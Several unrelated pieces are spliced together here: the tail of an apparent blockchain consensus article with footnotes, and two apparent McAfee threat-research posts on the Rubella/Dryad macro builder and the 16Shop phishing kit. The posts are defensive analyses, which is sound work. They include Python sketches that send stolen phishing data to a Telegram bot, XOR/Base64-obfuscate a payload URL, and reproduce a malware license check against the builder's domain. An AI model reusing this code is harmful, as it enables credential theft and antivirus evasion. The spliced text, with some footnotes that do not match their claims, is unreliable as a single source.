One of the primary criticisms of proof-of-work is its wasteful consumption of energy. Bitcoin’s implementation consumes enough energy to power 6.7 million households.[xxi] This consumption directly relates to cost when implementing your own blockchain solution. Researchers have sought alternatives to avoid excessive resource costs. This has led to several other consensus models.

Figure 5: Bitcoin power consumption compared to VISA transactions power consumption. Source: Digiconomist.

Proof of elapsed time (PoET)

Proof of elapsed time was first implemented in Hyperledger Sawtooth, originally developed by Intel. It is an example of a consensus model that does not require excess resource use or energy to form a consensus. Much like proof-of-work, it falls into the category of a Nakamoto-style (lottery) consensus. The lottery is based on a random wait time; the node with the shortest wait time creates the next block of the chain.

In most cases it is impossible to guarantee a node has both chosen a random wait time and waited the indicated amount. However, using a trusted execution environment could resolve this issue. To properly implement a secure trusted environment, specialized hardware is required. Intel, using Software Guard Extensions (SGX), can execute machine instructions in a secure trusted environment called an enclave. The SGX instruction set in modern Intel processors enables trusted execution.[xxii] Key functionality such as the random number generator and wait time can be executed inside the secure enclave. They prevent attackers, even with local access, from altering the machine instructions, preserving the integrity of the results. By using certificates and signatures, others can further validate that the output did indeed run within the secure enclave.

The main benefit of using PoET instead of other Nakamoto consensus algorithms is that its resource use is low, reducing costs. By using a random wait time instead of processing cycles, the actual power consumption is minimized. However, this comes with two drawbacks:

  • Hardware requirements
  • Required third-party trust

Although the PoET documentation lists only SGX, other platforms exist, including AMD, ARM, and RISC-V.[xxiii] As of this writing, however, no major PoET implementation for these platforms is available, leaving SGX as the only current option. Due to this limitation, only modern Intel processors can participate in a PoET network. Mixed trusted execution environments are not guaranteed for the future. This is entirely dependent on whether a trust mechanism is ever developed between platforms.

PoET also requires third-party trust. In the case of SGX, nodes must trust Intel’s implementation of their secure trusted environment as well as Intel’s services. For code to be validated, the secure container must be confirmed as well. The process requires trust in the Intel Attestation Service (IAS). In the case of self-attestation, the IAS API must show the container has previously been enabled. If self-attestation was not previously enabled, then the API will be called to verify the retrieval of the attestation verification report. Both routes require a trusted response from IAS.

Figure 6: Remote attestation flow.[xxiv]

Practical Byzantine fault tolerance[xxv]

Practical Byzantine fault tolerance takes a different approach, with lessons learned from work in distributed systems. Byzantine fault tolerance was initially designed to measure the dependability of distributed systems. As we discussed earlier, it is more like a voting system than a lottery. Rather than every node spending a resource to prove work, consensus is gained by a leader choosing transaction orders. Validation peers then communicate to one another until there is a consensus on the chosen transactions. Leaders are chosen by validation peer votes, enabling any faulty or malicious leaders to be removed by the network. This model has a few benefits over a resource-based model such as proof-of-work. The primary benefit is the limitation of resource use, a major criticism of many other consensus models. However, this benefit comes at some cost:

  • Reduced resistance against attacks
  • Lack of anonymity
  • Increased traffic

A well-known attack against many blockchain implementations is the 51%, or majority, attack. By controlling more than 50% of the network, an attacker can change the historical records in the ledger as well as assert some control over new blocks being mined. Byzantine fault tolerance, by comparison, requires only one-third of the replication nodes to be compromised.[xxvi] Byzantine fault tolerance sacrifices some security for speed and efficiency, reducing the threshold an attacker needs to meet to compromise the network. Essentially, if an attacker can control one-third of the transaction replication, they can break the validity of the transactions or prevent a valid consensus altogether.
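As a back-of-the-envelope illustration of that threshold, here is a small sketch of the classic PBFT sizing rule, under which a network of n replicas tolerates at most f faulty nodes while n ≥ 3f + 1:

```python
# Sketch: how many faulty replicas a PBFT-style network of n nodes can tolerate.
def max_faulty(n: int) -> int:
    # Largest f satisfying n >= 3f + 1.
    return (n - 1) // 3

for n in (4, 7, 10, 100):
    f = max_faulty(n)
    print(f"{n} replicas tolerate {f} faulty node(s); exceeding {f} voids the guarantees")
```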

Figure 7: Practical Byzantine fault tolerance. Source: Altoros.

A second compromise with using Byzantine fault tolerance is anonymity. The nature of this model requires node identity to be known so leaders can be chosen and removed if necessary. This precludes public blockchain implementations and suggests permissioned blockchain is a better fit.

The replication nodes also generate extensive network traffic. When the leader decides on the valid transaction, each replication node waits on a designated number of consistent responses from other nodes. This creates a significant amount of network traffic that may be manageable only for small blockchain networks. The network requirements for large implementations become unmanageable in a Byzantine fault tolerance system. Each node must wait until two-thirds of the nodes agree, with every node broadcasting to each other. Permissioned blockchains reduce the communications to subsets of nodes, easing the network requirements to participate.

Proof of stake

Proof-of-Stake consensus takes a route similar to Byzantine fault tolerance’s and benefits from many of the latter’s properties. At its core, proof of stake is a voting system in which ownership of a token provides more weight to the block-creation mechanism. This algorithm claims significant advantages over proof-of-work including security, reduced risk of centralization, and energy efficiency.[xxvii] Proof of stake avoids wasting resources by limiting resource use such as processing power and offers the advantage of producing faster transactions than similar proof-of-work systems. Proof of stake’s integrity is based on the assumption that most users will behave honestly. This may not always be a valid assumption, as observed in a “P + epsilon attack,” in which a malicious user provides bonus rewards to buy votes. The attacker structures the reward so that it is always more profitable to vote with the attacker than otherwise.[xxviii] There have been some implementations and proposals to mitigate these types of attacks, such as the “slasher” method, which penalizes certain behaviors.[xxix] Major implementations of proof of stake include Peercoin and EOS, with future migration plans for Ethereum.[xxx]
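To illustrate the core idea, here is a minimal stake-weighted selection sketch. The validator names and stake amounts are made up, and real protocols layer on randomness beacons, slashing penalties, and other safeguards.

```python
# Sketch: pick the next block creator with probability proportional to stake.
import random

stakes = {"alice": 60, "bob": 25, "carol": 15}   # tokens locked by each validator (illustrative)

def pick_validator(stakes: dict) -> str:
    validators = list(stakes)
    weights = [stakes[v] for v in validators]
    # More stake means a proportionally higher chance of creating the next block.
    return random.choices(validators, weights=weights, k=1)[0]

print(pick_validator(stakes))
```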

Federated Byzantine agreement (Stellar consensus protocol)

In the Stellar consensus protocol, when a node hears a statement a sufficient number of times, it assumes the statement is true and that any contradiction comes from a faulty node. The agreeing nodes are called a quorum; a portion of the quorum is a quorum slice. In a traditional Byzantine fault tolerance algorithm such as practical Byzantine fault tolerance, the quorum and the quorum slice are interchangeable because the nodes that broadcast the original statements are predefined as leaders that participating nodes agree on. By allowing for the slice, individual nodes can come to an agreement about a particular statement without regard for the entire network. Each individual node can make its agreements based on arbitrary criteria if the statement comes from a sufficient number of other nodes. Agreements can be shared across nodes if there is a quorum intersection between the two nodes (an overlapping node between quorum slices). In other words, if my friend trusts you, then I’ll trust you too.
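A minimal sketch of that per-node check might look like the following, where the node names, slices, and thresholds are purely illustrative:

```python
# Sketch: a node accepts a statement once enough members of one of its quorum slices assert it.
def slice_satisfied(slice_members: set, threshold: int, asserting_nodes: set) -> bool:
    return len(slice_members & asserting_nodes) >= threshold

my_slices = [({"bank_a", "bank_b", "bank_c"}, 2),   # trust two of these three banks
             ({"isp_x", "isp_y"}, 2)]               # or both of these ISPs
heard_from = {"bank_a", "bank_c"}                   # nodes asserting the statement so far

accepted = any(slice_satisfied(members, t, heard_from) for members, t in my_slices)
print(accepted)  # True: two of the three banks in the first slice agree
```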

Figure 8: Chart of anonymity and trust between proof-of-work, proof-of-stake, and federated and non-federated Byzantine fault tolerance consensuses.[xxxi]

Conclusion

New technologies can be confusing, and the excitement can lead to many exaggerated claims. Blockchain, though it holds a lot of promise, is not “one size fits all” for every problem. Many problems can be adequately solved at low cost using well-understood database implementations. The value of blockchain truly shines when the implementation space has two key elements:

  • Decentralization of owners
  • Lack of trust

It is not enough to have decentralized locations. A single business can have decentralized assets such as branches or organizational structures. There needs to be a clear separation of control between the entities. Databases have long proven capable of working across geographies. However, blockchain can provide a mechanism of agreement when central databases are difficult, if not impossible, to implement.

Any system with assumed trust is also not a good candidate for blockchain. Even if a central database is not an option, an interface to retrieve data and synchronize databases can still be orders of magnitude faster than blockchain. You simply need to trust the data has not been tampered with now or in the future. If the other parties have incentives, such as economic advantages, then trust is diminished and blockchain may help surmount the trust hurdle.

Determining which blockchain to use is not easy. If you simply want to release digital incentives such as rewards points, then tokens built on top of cryptocurrencies could work. If you require complicated rules, then smart contract–supported networks such as EOS and Ethereum may be what you need. Flexibility, privacy and enterprise-ready support can be found on various Hyperledger frameworks. Even privately built blockchains are a reasonable option in some scenarios. Your choice of Nakamoto-style consensus or Byzantine fault tolerance, coupled with concerns for privacy, speed, and scale will help guide your decision. It is important to remain informed of what blockchain can and cannot do. Databases should be your first choice until you can show both decentralization and lack of trust issues. Choosing blockchain for its strengths can transform your business in a positive way. Implementing blockchain where it does not fit could have devastating effects on a business’ ability to scale quickly and operate effectively.

 

———————————————————————————-

 

[i] https://www.ispot.tv/ad/doiE/ibm-blockchain-smart-supply-chain

[ii] https://www.coindesk.com/american-express-upgrades-rewards-program-hyperledger-blockchain/

[iii] https://www.americanbanker.com/news/has-amex-found-a-data-gold-mine-with-its-rewards-blockchain

[iv] https://lo3energy.com/

[v] https://www.siemens.com/press/en/pressrelease/?press=/en/pressrelease/2017/energymanagement/pr2017120121emen.htm

[vi] https://docs.wixstatic.com/ugd/bd1fb8_4e16d895b37e4b2a9d4dafdbb82cef2a.pdf

[vii] http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=1&p=1&f=G&l=50&d=PTXT&S1=9,928,746.PN.&OS=pn/9,928,746&RS=PN/9,928,746

[viii] https://novablitz.com

[ix] https://bitcoin.org/bitcoin.pdf

[x] https://medicalchain.com/en/

[xi] https://www.debeersgroup.com/media/company-news/2018/de-beers-group-successfully-tracks-first-diamonds-from-mine-to-r

[xii] https://en.bitcoin.it/wiki/Weaknesses

[xiii] https://www.mcafee.com/enterprise/en-us/assets/reports/rp-blockchain-security-risks.pdf

[xiv] https://www.hyperledger.org/

[xv] https://www.ibm.com/developerworks/cloud/library/cl-blockchain-private-confidential-transactions-hyperledger-fabric-zero-knowledge-proof/index.html

[xvi] https://www.ibm.com/blockchain/hyperledger

[xvii] https://medium.com/coinmonks/comparison-of-permissioned-blockchains-6537a0694df0

[xviii] https://docs.google.com/spreadsheets/d/12PPUxqDaTSR2K2gNQJ7EqIN1ezCiwwa51GZTcN3O6T8/edit#gid=0

[xix] https://www.forbes.com/sites/michaeldelcastillo/2018/07/03/big-blockchain-the-50-largest-public-companies-exploring-blockchain/#4cbf04e42b5b

[xx] https://bitcoin.org/bitcoin.pdf

[xxi] https://digiconomist.net/bitcoin-energy-consumption

[xxii] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxiii] https://sawtooth.hyperledger.org/docs/core/releases/1.0/introduction.html

[xxiv] https://software.intel.com/en-us/articles/code-sample-intel-software-guard-extensions-remote-attestation-end-to-end-example

[xxv] https://blockonomi.com/practical-byzantine-fault-tolerance/

[xxvi] http://pmg.csail.mit.edu/papers/osdi99.pdf

[xxvii] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxviii] https://blog.ethereum.org/2015/01/28/p-epsilon-attack/

[xxix] https://github.com/ethereum/wiki/wiki/Proof-of-Stake-FAQs

[xxx] https://en.wikipedia.org/wiki/Proof-of-stake

[xxxi] https://medium.com/@lkolisko/in-depth-on-differences-between-public-private-and-permissioned-blockchains-aff762f0ca24


McAfee ATR Aids Police in Arrest of the Rubella and Dryad Office Macro Builder Suspect

Every day, thousands of people receive emails with malicious attachments in their inbox. Disguised as a missed payment or an invoice, a cybercriminal sender tries to entice a victim into opening the document and enabling the embedded macro. The macro then proceeds to pull in a whole array of nastiness and infect the victim’s machine. Given the high success rate, malicious Office documents remain a preferred weapon in a cybercriminal’s arsenal. To take advantage of this demand and generate revenue, some criminals have created off-the-shelf toolkits for building malicious Office documents. These toolkits are mostly offered for sale on underground cybercriminal forums.

As announced today, the Dutch National High-Tech Crime Unit (NHTCU) arrested an individual suspected of building and selling one such criminal toolkit, the Rubella Macro Builder. McAfee Advanced Threat Research spotted the Rubella toolkit in the wild some time ago and was able to provide the NHTCU with insights that proved crucial in its investigation. In the following blog we explain some of the details we found that helped unmask the suspected actor behind the Rubella Macro Builder.

What is an Office Macro Builder?

An Office Macro Builder is a toolkit designed to weaponize an Office document so it can deliver a malicious payload through obfuscated macro code that purposely tries to bypass endpoint security defenses. By using a toolkit dedicated to this purpose, an actor can push out higher quantities of malicious documents and successfully outsource the first-stage evasion and delivery process to a specialized third party. Below is an overview of the general workings of an Office Macro Builder. The defense evasion shown here is specific to the Rubella Office Macro Builder; additional techniques can be found in other builders.

Dutch Language OpSec fail….

Rubella Macro Builder is such a toolkit, offered by an actor using the same nickname, “Rubella”. The toolkit was marketed with colorful banners on different underground forums. For the price of 500 US dollars per month, you could use the toolkit to weaponize Office documents that bypass endpoint security systems and deliver a malicious payload or run PowerShell code of your choice.

Rubella advertisement banner

In one of Rubella’s forum postings the actor detailed the toolkit and claimed that it managed to bypass the Windows Antimalware Scan Interface (AMSI) present in Windows 10. To prove this success, the post contained a link to a screenshot. To a Dutch researcher, this screenshot immediately stood out because of the Dutch version of Microsoft Word in use. Dutch is a very uncommon language: only a small percentage of the world’s population speaks it, and an even smaller percentage of cybercriminals use it.

The linked screenshot with the Dutch version of Microsoft Word.

Interestingly enough, we reported last year on the individuals behind the Coinvault ransomware. One of the reasons they got caught was the use of flawless Dutch in their code. With this in the back of our minds, we decided to go deeper down the rabbit hole.

Forum Research

We looked further into the large number of posts by Rubella to learn more about the person behind the builder. The actor was actually promoting a variety of products and services, some self-written, ranging from (stolen) credit card data, a crypto wallet stealer and malicious loader software to a newly pitched product called Tantalus ransomware-as-a-service.

During our research we were able to link different nicknames used by the actor on several forums across a timespan of many years. Piecing it all together, Rubella showed the classic growth pattern of an aspiring cybercriminal: starting out gaining technical security knowledge on beginner forums with low op-sec, then gradually moving to some of the bigger, exclusive forums to offer products and services.

PDB path Breitling

One of the posts Rubella placed on a popular hacker forum promoted a piece of free software the actor had coded to spoof email. The posting contained a link to VirusTotal and included a SHA-256 hash of the software. This caught our interest, since it offered a possibility to link the adversary to the capability.

Email spoofer posting including the VirusTotal link 

Closer examination of the software on VirusTotal showed that the mail spoofer contained a debug or PDB path, “C:\Users\Breitling”. Even though the username Breitling isn’t very revealing about an actual person, leaving such a specific PDB path within malware is a classic mistake.

By pivoting on the specific PDB path we found additional samples on VirusTotal, including a file that was named RubellaBuilder.exe, which was a version of the Macro builder that Rubella was offering. Later in the blog post we will take a closer look at the builder itself.

Finding additional samples with the Breitling PDB path

Since Breitling was most likely the username used on the development machine, we wondered if we could find Office documents that were crafted on the same machine and thus also contained the author name Breitling. We found an Office document with Breitling as author, and the document happened to be created with a Dutch version of Microsoft Word.

The Word document containing the author name Breitling.

Closer inspection of the content of the Word document revealed that it also contained a string with the familiar Jabber account of Rubella: Rubella(@)exploit.im.

The Malicious document containing the string with the actor’s jabber account.

Circling back to the forums, we found an older posting under one of the nicknames we could link to Rubella. In this posting the actor asks for advice on how to add a registry key using C# and placed another screenshot to show the community what they were doing. This behavior clearly shows a lack of skill at the time, but also a thirst for knowledge.

Older posting where the actor asks for help.

A closer look at the screenshot revealed the same PDB path C:\Users\Breitling\.

Screenshot with the Breitling PDB path

Chatting with Rubella

Since Rubella was quite extroverted on the underground forums and had stated Jabber contact details in advertisements, we decided to carefully initiate contact in the hope that we would get access to some more information. About a week after we added Rubella to our Jabber contact list, we received a careful “Hi.” We started talking, posing as a potential buyer and carefully mentioning our interest in the Rubella Macro Builder. During this chat Rubella was quite responsive and, like a real businessperson, mentioned that he was offering a new “more exclusive” Macro Builder named Dryad. Rubella proceeded to share a screenshot of Dryad with us.

Screenshot of Dryad shared by Rubella

 Eventually we ended our conversation in a friendly manner and told Rubella we would be in touch if we remained interested.

Dryad Macro Builder

Based on the information provided in the chat with Rubella we performed a quick search for the Dryad Macro Builder. We eventually found a sample and decided to analyze it further and compare it for overlap with the Rubella Macro Builder.

PE Summary

We noticed that the program is a .NET assembly; .NET is often a preferred language for less skilled malware coders.

Dynamic Analysis

When we ran the application, it asked us to enter a login and password in order to run.

We also noticed a generated HWID (hardware ID) that was always the same when running the app. The HWID is a unique identifier specific to the machine the app runs on and is used to register the app.

When trying to enter a random name we detected a remote connection to the website ‘hxxps://tailoredtaboo.com/auth/check.php’ to verify the license.

The request is made with the following parameters ‘hwid=<HWID>&username=<username>&password=<password>’.

Once the app is running and registered it shows the following interface.

In this interface it is possible to see the functions offered by the app; it is similar to the screenshot that was shared during our chat.

Basically, the tool allows the following:

  • Download and execute a malicious executable from a URL
  • Execute a custom command
  • Type of payload can be exe, jar, vbs, pif, scr
  • Modify the dropped filename
  • Load a stub for increased obfuscation
  • Generate a Word or Excel document

It contains an Anti-virus Evasion tab:

  • Use encryption and modify the encryption key
  • Add junk code
  • Add loop code

It also contains a tab which is still in development:

  • Create Jscript or VBscript
  • Download and execute
  • Payload URL
  • Obfuscation with base64 and AMSI bypass which are not yet developed.

Reverse Engineering

The sample is coded in .Net without any obfuscation. We can see in the following screenshot the structure of the file.

Additionally, it uses the Bunifu framework for the graphic interface. (https://bunifuframework.com/)

Main function

The main function launches the interface with the pre-configuration options. We can see here the link to putty.exe (also visible in the screenshots) for the payload that needs to be changed by the user.

Instead of running an executable, it is also possible to run a command.

By default, the path for the stub is the following:

We can clearly see here a link with Rubella.

Licensing function

To use the program, a license is required, which the user has to enter via the login form.

The following function shows the login form.

To validate the license, the program performs several checks, combining a hardware ID, a username and a password.

The following function generates the hardware id.

It gets information from ‘Win32_Processor class’ to generate the ID.

It collects information from:

  • UniqueId: Globally unique identifier for the processor. This identifier may only be unique within a processor family.
  • ProcessorId: Processor information that describes the processor features.
  • Name: This value comes from the Processor Version member of the Processor Information structure in the SMBIOS information.
  • Manufacturer: This value comes from the Processor Manufacturer member of the Processor Information structure.
  • MaxClockSpeed: Maximum speed of the processor, in MHz.

Then it will collect information from the ‘Win32_BIOS class’.

  • Manufacturer: This value comes from the Vendor member of the BIOS Information structure.
  • SMBIOSVersion: This value comes from the BIOS Version member of the BIOS Information structure
  • IdentificationCode: Manufacturer’s identifier for this software element.
  • SerialNumber: Assigned serial number of the software element.
  • ReleaseDate: Release date of the Windows BIOS in the Coordinated Universal Time (UTC) format of YYYYMMDDHHMMSS.MMMMMM(+-)OOO.
  • Version: Version of the BIOS. This string is created by the BIOS manufacturer.

Then it will collect information from the ‘Win32_DiskDrive class’.

  • Model: Manufacturer’s model number of the disk drive.
  • Manufacturer: Name of the disk drive manufacturer.
  • Signature: Disk identification. This property can be used to identify a shared resource.
  • TotalHead: Total number of heads on the disk drive.

Then it will collect information from the ‘Win32_BaseBoard class’.

  • Model: Name by which the physical element is known.
  • Manufacturer: Name of the organization responsible for producing the physical element.
  • Name,
  • SerialNumber

Then it will collect information from the ‘Win32_VideoController class’.

  • DriverVersion
  • Name

With all that hardware information collected it will generate a hash that will be the unique identifier.

This hash, the username and password will be sent to the server to verify if the license is valid. In the source code we noticed the tailoredtaboo.com domain again.
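To make the flow concrete, below is a minimal Python sketch of how such a hardware-ID-plus-license check can be put together. It is a reconstruction for illustration only: the builder itself is a .NET assembly, and the exact WMI properties queried, the hash algorithm, the HTTP method and the server response format are assumptions. Only the hwid/username/password parameters and the check.php endpoint come from the analysis above.

```python
# Minimal sketch (assumption): approximates the HWID + license-check logic
# described above. The real builder is .NET; the exact WMI properties,
# hash algorithm and HTTP format may differ.
import hashlib

import requests  # pip install requests
import wmi       # pip install WMI (Windows only)

# WMI classes and a subset of the properties listed above; properties missing
# on a given machine are simply skipped.
SOURCES = {
    "Win32_Processor":       ["UniqueId", "ProcessorId", "Name", "Manufacturer", "MaxClockSpeed"],
    "Win32_BIOS":            ["Manufacturer", "SerialNumber", "ReleaseDate", "Version"],
    "Win32_DiskDrive":       ["Model", "Manufacturer", "Signature"],
    "Win32_BaseBoard":       ["Manufacturer", "SerialNumber"],
    "Win32_VideoController": ["DriverVersion", "Name"],
}

def generate_hwid() -> str:
    c = wmi.WMI()
    parts = []
    for wmi_class, props in SOURCES.items():
        for instance in getattr(c, wmi_class)():
            parts.extend(str(getattr(instance, prop, "")) for prop in props)
    # Reduce the collected hardware information to a single identifier.
    return hashlib.sha256("".join(parts).encode()).hexdigest()

def check_license(url: str, username: str, password: str) -> bool:
    # The builder sends hwid, username and password to its licensing endpoint
    # (the observed endpoint is the defanged hxxps://tailoredtaboo.com/auth/check.php).
    resp = requests.post(url, data={
        "hwid": generate_hwid(),
        "username": username,
        "password": password,
    }, timeout=10)
    return "valid" in resp.text.lower()   # success criterion is an assumption
```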

Generate Macro

To generate a macro, the builder uses several parts. The format function shows how each file structure is generated.

The structure is the following:

To save the macro in the malicious doc it uses the function ‘SaveMacro’:

Evasion Techniques

Additionally, it generates random code to obfuscate the content and adds junk code.

The function GenRandom is used to generate random strings, chars as well as numbers. It is used to obfuscate the macro generated.

It also uses a Junk Code function to add junk code into the document:

For additional obfuscation it uses XOR encryption as well as Base64.
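As an illustration of this combination, here is a small Python sketch of the general random-identifier, XOR and Base64 approach. It is not Dryad’s .NET code; names such as gen_random are only meant to mirror the builder’s GenRandom idea, and the payload URL is a placeholder.

```python
# Minimal sketch (assumption): generic XOR + Base64 string obfuscation and
# random-identifier generation, as described above. Not the builder's code.
import base64
import random
import string

def gen_random(length: int = 8) -> str:
    """Random identifier, similar in spirit to the builder's GenRandom helper."""
    return "".join(random.choices(string.ascii_letters, k=length))

def xor_encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def obfuscate(text: str, key: str) -> str:
    """XOR the string with the key, then Base64-encode the result."""
    return base64.b64encode(xor_encrypt(text.encode(), key.encode())).decode()

# The generated macro would embed the obfuscated blob plus the decode logic,
# using throwaway identifiers from gen_random() as junk/obfuscation.
blob = obfuscate("http://example.com/payload.exe", key=gen_random(16))
```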

Write Macro

Finally, the function WriteMacro, writes the content previously configured:

 

Under construction

We also noticed that the builder contains additional functions that are still under development, as we can see with the “Script Generator” tab.

A message is printed when we click on it, indicating that this function is still in development.

Additionally, we can see the “Decoy Option” tab, which is just a placeholder template for another tab and does not show anything. It seems the author left it in place to build on later.

Rubella Similarities

Dryad is very similar to the Rubella Builder; many hints present in the code confirm the conversation we had with Rubella. Unlike Rubella, Dryad did have a scrubbed PDB path.

Both Rubella builder and Dryad Builder are using the Bunifu framework for the graphic design.

The license check is also the same function, using the domain tailoredtaboo.com. Below is the license check function from the Rubella builder:

Tailoredtaboo.com Analysis

We analyzed the server used to register the builder and discovered additional samples:

Most of these samples were Word documents generated with the builder.

A quick search into the domain Tailoredtaboo showed that it had several subdomains, including a control panel on a subdomain named cpanel.tailoredtaboo.com.

The cPanel subdomain had the following login screen in the Dutch language.

The domain tailoredtaboo.com has been linked to malicious content in the past. On Twitter the researcher @nullcookies reported in April 2018 that he found some malicious files hosted on the specific domain. In the directory listing of the main domain there were several files also mentioning the name Rubella.

TailoredTaboo.com mentioned on Twitter

 

Based on all the references, and the way the domain Tailoredtaboo.com was used, we believe that the domain plays a central administrative role for both the Rubella and Dryad Macro Builders and can provide insight into the customers of both.

Conclusion

Toolkits that build weaponized Office documents, like Dryad and Rubella, cater to the increasing cybercriminal demand for this type of infection vector. With the arrest of the suspect comes an end to the era of the Dryad and Rubella Macro Builders. Based on his activity, the suspect looked like quite the cybercriminal entrepreneur, but given his young age this is also a worrisome thought. If only he had used his skills for good. The lure of quick cash was apparently more enticing than building a solid long-term career. We at McAfee never like to see young, talented individuals heading down a dark path.

Indicators of Compromise

URL / Website:

hxxps://tailoredtaboo.com/auth/check.php

Hash Builder:

  • Dryad: 7d1603f815715a062e18ae56ca53efbaecc499d4193ea44a8aef5145a4699984
  • Rubella: 2a20d3d9ac4dc74e184676710a4165c359a56051c7196ca120fcf8716b7c21b9

Hash related samples:

93db479835802dc22ba5e55a7915bd25f1f765737d1efab72bde11e132ff165a

ad2f9ef7142a43094161eae9b9a55bfbb6dff85d890d1823e77fc4254f29ef17

c2c2fdcc36569f6866e19fcda702c823e7bf73d5ca394652ac3a0ccc6ff9c905

3c55e54f726758f5cb0d8ef81be47c6612dba5a73e3a29f82b73a4c773e691a3

74c8389f20e50ae3a9b7d7e69f6ae7ed1a625ccc8bb6a52b3cc435cf94e6e2d3

388ee9bc0acaeec139bc17bceb19a94071aa6ae43af4ec526518b5e1f1f38f07

08694ad23cafe45495fa790bfdc411ab5c81cc2412370633a236c688b07d26aa

428a30b8787d2ba441dba1dbc3acbfd40cf7f2fc143131a87a93f27db96b7a75

c777012abe224126dca004561619cb0791096611257099058ece1b8d001277d0

5b773acad7da2f33d86286df6b5e95ae355ac50d143171a5b7ee61d6b3cad6d5

a17e3c2271a94450a7a7c6fcd936f177fc40ea156de4deafdfc14fd5aadfe503

1de0ebc0c375332ec60104060eecad77e0732fa2ec934f483f330110a23b46e1

b7a86965f22ed73de180a9f98243dc5dcfb6ee30533d44365bac36124b9a1541

The post McAfee ATR Aids Police in Arrest of the Rubella and Dryad Office Macro Builder Suspect appeared first on McAfee Blogs.

16Shop Now Targets Amazon

Since early November 2018 McAfee Labs have observed a phishing kit, dubbed 16Shop, being used by malicious actors to target Apple account holders in the United States and Japan. Typically, the victims receive an email with a pdf file attached.

An example of the message within the email is shown below, with an accompanying translation:

When the victims click on the link in the attached pdf file, they are redirected to a phishing site where they are then tricked into updating their account information, which often includes credit card details.

The following is one of the many pdf files that we have seen attached to the phishing emails:

The phishing page is shown below:

 

The following image shows the information that is being phished:

The following map shows the locations where we have observed this phishing campaign:

The author of this phishing campaign used the conversion site Pdfcrowd.com to create the malicious pdf file, which was attached in the phishing emails. (The pdf tag can be seen below):

16Shop phishing kit

The phishing kit originates in Indonesia and the code handles multiple languages:

Most phishing kits will email the credit card and account details entered on the site directly to the malicious actor. The 16Shop kit does this, too, and also stores a local copy in other text files. This is a weakness in the kit because anyone visiting the site can download the clear-text files (if the attacker uses the default settings).

The kit includes a local blacklist, which blocks certain IP addresses from accessing the website. This blacklist contains lots of IPs of security companies, including McAfee. The blacklisting prevents malware researchers from accessing the phishing sites. A snippet is shown below:
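Conceptually, such a check is only a lookup of the visitor’s address against a bundled list. The sketch below shows the general idea in Python rather than the kit’s PHP; the file name, wildcard matching and redirect behavior are illustrative, not taken from 16Shop.

```python
# Conceptual sketch (assumption): how a phishing kit's IP blacklist check
# typically works. 16Shop itself is written in PHP; names here are illustrative.
def is_blocked(client_ip: str, blacklist_path: str = "blacklist.txt") -> bool:
    with open(blacklist_path) as fh:
        entries = {line.strip() for line in fh if line.strip() and not line.startswith("#")}
    # Kits commonly match exact addresses or simple prefix wildcards of
    # security-vendor ranges.
    return client_ip in entries or any(
        entry.endswith("*") and client_ip.startswith(entry.rstrip("*"))
        for entry in entries
    )

if is_blocked("203.0.113.7"):
    # Researchers and crawlers are typically redirected to a benign page.
    print("redirect visitor to a legitimate-looking site")
```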

While looking at the code we observed several comments that appear to be tags of the creator. (More on this later.)

The creator of 16Shop also developed a tool to generate and send the phishing emails. We managed to obtain a copy and analyze it.

The preceding configuration shows how an attacker can set the subject field as well as the origin address of the email. While looking through the source files, we noticed the file list.txt. This file contains the list of email addresses that the phisher sends to. The example file uses the address riswandanoor@yahoo.com:

This email, along with the name in the comments from the phishing kit, could potentially tell us some more about the creators of the kit.

The author of 16Shop

The author of the kit goes by the alias DevilScreaM. We gathered lots of information on this actor and found that this individual was involved in the Indonesian hacking group “Indonesian Cyber Army.” Several websites were defaced by this group and tagged by DevilScreaM in 2012.

We found DevilScreaM created the site Newbie-Security.or.id, an Indonesian site of hacking tools frequented by members of the Indonesian Cyber Army. We also discovered two eBooks written by DevilScreaM; they contain advice on website hacking and penetration testing.

The timeline of DevilScreaM’s activity shows a notable change in late 2012 and the middle of 2013. DevilScreaM stopped defacing websites and created an anti-malware product, ScreaMAV, for the Indonesian market. This “white hat” activity did not last. In mid-2013 they began defacing sites again and posting exploits on 0day.today mostly around WordPress vulnerabilities.

DevilScreaM’s GitHub page contains various tools, including a PHP remote shell used on compromised websites, as well as commits on the z1miner Monero (XMR) miner tool. In late 2017 DevilScreaM created the 16Shop phishing kit and set up a Facebook group to sell licenses and support. In November 2018, this private group had over 200 members. We checked the group in mid-June 2019 and it now has over 300 members and over 200 posts. Despite the questionable content, the group not only persists unchanged on social media, but continues to grow.

McAfee has notified Facebook of the existence of this group. The social network has taken an active posture in recent months of taking down groups transacting in such malicious content.

Recent News and Switch to Amazon

In May 2019, several blogs were published highlighting that a version of 16Shop had been cracked and included a backdoor that sends all data via Telegram to the author of the kit. We can confirm that this backdoor was not present in the version we analysed in November. This leads us to believe that it was added by a second malicious actor and not the original author of 16Shop.

[Telegram Bot API command from Cracked 16shop kit to send stolen data]
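For reference, exfiltration over the Telegram Bot API generally looks like the sketch below, shown in Python rather than the kit’s PHP. The bot token and chat ID are placeholders, and the exact fields sent by the cracked kit may differ.

```python
# Sketch (assumption): generic Telegram Bot API exfiltration, similar in effect
# to the backdoor reported in the cracked 16Shop kit. Token/chat_id are placeholders.
import requests

BOT_TOKEN = "<bot-token>"   # placeholder
CHAT_ID = "<chat-id>"       # placeholder

def exfiltrate(stolen: dict) -> None:
    text = "\n".join(f"{k}: {v}" for k, v in stolen.items())
    requests.post(
        f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
        data={"chat_id": CHAT_ID, "text": text},
        timeout=10,
    )
```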

In May 2019, we found a new phishing kit which was targeting Amazon account holders. Looking at the code of the kit, you can see it shows several similarities to the 16shop kit targeting Apple users back in November 2018.

 

[Fake Login page]

[PHP code of Phishing Kit and Admin page]

Around the same time that we discovered the Amazon Phishing Kit, the social media profile picture of the actors we believe are behind 16shop changed to a modified Amazon logo. This reinforces our findings that the same group is responsible for the development of the new malicious kit.

[Obfuscated Profile Pic]

We believe that victims of this kit will be led to the malicious websites via links in phishing emails.

We recommend that users who want to check any account changes on Amazon, received via email or other sources, go to Amazon.com directly and navigate from there rather than following suspicious links.

Conclusion

During our monitoring, we observed over 200 malicious URLs serving this phishing kit, which highlights its widespread use (all URLs seen have been classified as malicious by McAfee).

